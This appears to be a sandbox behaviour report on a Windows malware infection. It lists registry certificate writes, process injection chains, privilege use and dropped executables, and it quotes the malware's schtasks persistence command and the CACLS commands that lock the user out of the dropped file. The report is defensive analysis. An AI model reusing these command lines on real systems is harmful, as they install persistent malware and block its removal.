7d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9890.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 1244 wrote to memory of 1932 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E66A.exe
PID 1244 wrote to memory of 1932 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E66A.exe
PID 1244 wrote to memory of 1932 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E66A.exe
PID 1244 wrote to memory of 1932 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E66A.exe
PID 2968 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 36

C:\Users\Admin\AppData\Local\Temp\E2A2.exe

C:\Users\Admin\AppData\Local\Temp\E2A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\E66A.exe

C:\Users\Admin\AppData\Local\Temp\E66A.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 132

C:\Users\Admin\AppData\Local\Temp\E8EA.bat

"C:\Users\Admin\AppData\Local\Temp\E8EA.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9E2.tmp\E9E3.tmp\E9E4.bat C:\Users\Admin\AppData\Local\Temp\E8EA.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\ECA3.exe

C:\Users\Admin\AppData\Local\Temp\ECA3.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:340993 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\EDDC.exe

C:\Users\Admin\AppData\Local\Temp\EDDC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 132

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:332 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\F195.exe

C:\Users\Admin\AppData\Local\Temp\F195.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\taskeng.exe

taskeng.exe {8F3C0FBA-5638-42E4-B77A-272792604F86} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\42F0.exe

C:\Users\Admin\AppData\Local\Temp\42F0.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\9535.exe

C:\Users\Admin\AppData\Local\Temp\9535.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 528

C:\Users\Admin\AppData\Local\Temp\9890.exe

C:\Users\Admin\AppData\Local\Temp\9890.exe

C:\Users\Admin\AppData\Local\Temp\99D8.exe

C:\Users\Admin\AppData\Local\Temp\99D8.exe

C:\Windows\system32\makecab.exe

